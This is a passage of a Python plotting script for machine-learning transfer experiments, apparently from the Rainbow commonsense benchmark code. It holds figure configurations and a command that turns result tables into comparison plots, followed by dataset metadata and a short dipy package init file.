# of data).
ax.scatter(
control_scores, treatment_scores, c="k", s=8,
)
# Compute the minimum and maximum scores.
min_score = min(
min(data["control_scores"].min(), data["treatment_scores"].min())
for data in group_to_data.values()
)
max_score = max(
max(data["control_scores"].max(), data["treatment_scores"].max())
for data in group_to_data.values()
)
# Scale the x and y limits
ax.set_xlim(0.99 * min_score, 1.01 * max_score)
ax.set_ylim(0.99 * min_score, 1.01 * max_score)
# Plot the y = x line.
ax.plot(
[0.99 * min_score, 1.01 * max_score],
[0.99 * min_score, 1.01 * max_score],
**CENTERLINE_STYLE_KWARGS,
)
# Set the x and y ticks.
ticks = np.linspace(min_score, max_score, num=5)[1:]
tick_labels = [f"{x:.2f}" for x in ticks]
ax.set_xticks(ticks)
ax.set_xticklabels(tick_labels)
ax.set_yticks(ticks)
ax.set_yticklabels(tick_labels)
# Add the second axis at the top of the figure.
def perf2cost(x):
if len(x) == 0:
return x
return control_smoother_inv.predict(x.reshape(-1)).tolist()
ax2 = ax.twiny()
ax2.set_xlim(ax.get_xlim())
ax2.set_xticks(ticks)
ax2.set_xticklabels([f"{int(x):d}" for x in perf2cost(ticks)])
return _make_plot_grid(
plot_func=plot_func,
x_label="baseline accuracy",
y_label="new method accuracy",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=None,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
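
# The performance equivalent curve instead parametrizes by training set
# size: for each size, plot the smoothed treatment score against the
# smoothed control score. A sketch with the same synthetic data as above:
def _example_performance_equivalent():
    sizes = np.array([100, 400, 1600, 6400, 16000])
    control_scores = np.array([0.55, 0.62, 0.68, 0.72, 0.74])
    treatment_scores = np.array([0.60, 0.66, 0.71, 0.74, 0.76])
    control = IsotonicRegression(out_of_bounds="clip").fit(
        sizes, control_scores
    )
    treatment = IsotonicRegression(out_of_bounds="clip").fit(
        sizes, treatment_scores
    )
    xs = np.linspace(sizes.min(), sizes.max(), num=2500)
    # (control score, treatment score) pairs at equal amounts of data.
    return control.predict(xs), treatment.predict(xs)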
# figure configuration
@dataclasses.dataclass
class FigureConfig:
"""A configuration object for a figure."""
    fig_name: str  # directory name for the figure's output
    control_fname: str  # control (baseline) results table, relative to the topic
    treatment_fname: str  # treatment results table, relative to the topic
    score_col: str  # column holding the score to plot
    hyper_param_cols: List[str]  # hyper-parameter columns to maximize the score over
    control_split_key: List[str]  # columns splitting the control data across figures
    treatment_split_key: List[str]  # columns splitting the treatment data across figures
    plot_func: Callable  # one of the plot_* functions above
    plot_kwargs: Dict[str, Any]  # key-word arguments forwarded to plot_func
TOPIC_TO_FIGURE_CONFIG = {
"effect-of-size": [
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {"commonsenseqa": "CQA"}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["task"],
treatment_split_key=["task", "multiset"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "model_size",
"subfigure_fmt": str.capitalize,
"subfigure_order": lambda x: {
"small": 0,
"base": 1,
"large": 2,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["task"],
treatment_split_key=["task", "multiset"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "model_size",
"subfigure_fmt": str.capitalize,
"subfigure_order": lambda x: {
"small": 0,
"base": 1,
"large": 2,
}[x],
},
),
],
"transferring-knowledge-graphs": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["direction", "rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="full-task_compare-knowledge-graphs_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["direction", "rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-knowledge-graphs_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "knowledge-graph",
"group_fmt": lambda x: {
"atomic": "ATOMIC",
"conceptnet": "ConceptNet",
"comet": "Both",
}[x],
"group_order": lambda x: {
"atomic": 0,
"conceptnet": 1,
"comet": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
],
"transferring-multisets": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="full-task_compare-transfer-methods_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"subfigure_order": lambda x: {
"anli": 0,
"cosmosqa": 1,
"hellaswag": 2,
"physicaliqa": 3,
"socialiqa": 4,
"winogrande": 5,
}[x],
},
),
],
"transferring-to-external-tasks": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"commonsenseqa": "CQA",
"joci": "JOCI",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"commonsenseqa": "CQA",
"joci": "JOCI",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": lambda x: {"commonsenseqa": 0, "joci": 1}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": lambda x: {"commonsenseqa": 0, "joci": 1}[x],
},
),
# Make equivalent curves for individual tasks to use in
# illustrating how equivalent curves work.
FigureConfig(
fig_name="learning-curves_task_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size", "task"],
treatment_split_key=["model_size", "task", "transfer_method"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_task_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size", "task"],
treatment_split_key=["model_size", "task", "transfer_method"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"glue": "GLUE",
"super-glue": "SuperGLUE",
"rainbow": "Rainbow",
}[x],
"group_order": lambda x: {
"rainbow": 0,
"glue": 1,
"super-glue": 2,
}[x],
"subfigure_col": "task",
"subfigure_fmt": lambda x: {
"commonsenseqa": "CommonsenseQA",
"joci": "JOCI",
}[x],
"subfigure_order": None,
},
),
],
}
"""Figure configurations for all experiments."""
# main function
@click.command()
@click.argument(
"src", type=click.Path(exists=True, dir_okay=True, file_okay=False)
)
@click.argument(
"dst", type=click.Path(exists=False, dir_okay=True, file_okay=False)
)
def create_multi_experiment_figures(src: str, dst: str) -> None:
"""Create multi-experiment figures for the Rainbow results.
Read in the raw tables from SRC and write out the figures to DST.
"""
utils.configure_logging(clear=True)
for topic, figure_configs in tqdm.tqdm(
TOPIC_TO_FIGURE_CONFIG.items(), **settings.TQDM_KWARGS
):
for config in tqdm.tqdm(figure_configs, **settings.TQDM_KWARGS):
os.makedirs(os.path.join(dst, topic, config.fig_name))
# Read in the data.
control_fpath = os.path.join(src, topic, config.control_fname)
control_data = (
pd.read_csv(control_fpath)
if control_fpath.endswith("csv")
else pd.read_json(control_fpath, lines=True)
)
treatment_fpath = os.path.join(src, topic, config.treatment_fname)
treatment_data = (
pd.read_csv(treatment_fpath)
if treatment_fpath.endswith("csv")
else pd.read_json(treatment_fpath, lines=True)
)
# Max over the hyper-parameters.
treatment_data = (
treatment_data.groupby(
[
col
for col in treatment_data.columns
if col not in config.hyper_param_cols
and col != config.score_col
]
)
.max()[config.score_col]
.reset_index()
)
control_data = (
control_data.groupby(
[
col
for col in control_data.columns
if col not in config.hyper_param_cols
and col != config.score_col
]
)
.max()[config.score_col]
.reset_index()
)
for key, treatment_subdata in treatment_data.groupby(
config.treatment_split_key
):
control_subdata = control_data[
# Select only rows which agree with the current key.
functools.reduce(
operator.and_,
[
control_data[key_name] == key_value
for key_name, key_value in zip(
config.treatment_split_key, key
)
if key_name in config.control_split_key
],
)
]
fig, axes = config.plot_func(
control_data=control_subdata,
treatment_data=treatment_subdata,
score_col=config.score_col,
**config.plot_kwargs,
)
dst_path = os.path.join(
dst,
topic,
config.fig_name,
".".join(list(key) + [config.fig_name, "png"]),
)
fig.savefig(dst_path)
plt.close(fig)
if __name__ == "__main__":
create_multi_experiment_figures() # pylint: disable=no-value-for-parameter
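# Example invocation (a sketch with hypothetical directory names; the script's
# on-disk filename is not shown in this record):
#     $ python create_multi_experiment_figures.py raw_tables/ figures/
# SRC must be an existing directory holding the per-topic raw tables; the
# per-topic figure directories under DST are created as the script runs.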
| 37.39851 | 93 | 0.500855 | 5,838 | 60,249 | 4.94433 | 0.069373 | 0.020613 | 0.016629 | 0.027092 | 0.849506 | 0.83797 | 0.828928 | 0.814135 | 0.800589 | 0.796605 | 0 | 0.008307 | 0.386596 | 60,249 | 1,610 | 94 | 37.421739 | 0.772736 | 0.116002 | 0 | 0.794776 | 0 | 0 | 0.230504 | 0.06358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008209 | false | 0 | 0.009701 | 0.000746 | 0.03209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c9fabfe752163ee434d2d74621bef44cff8e4264 | 175 | py | Python | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | 2 | 2018-07-25T14:04:20.000Z | 2021-02-10T07:10:10.000Z | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | null | null | null | dipy/direction/__init__.py | martcous/dipy | 6bff5655f03db19bde5aa951ffb91987983a889b | [
"MIT"
] | 2 | 2018-07-24T21:20:54.000Z | 2018-08-27T04:08:24.000Z |
from .probabilistic_direction_getter import ProbabilisticDirectionGetter
from .probabilistic_direction_getter import DeterministicMaximumDirectionGetter
from .peaks import *
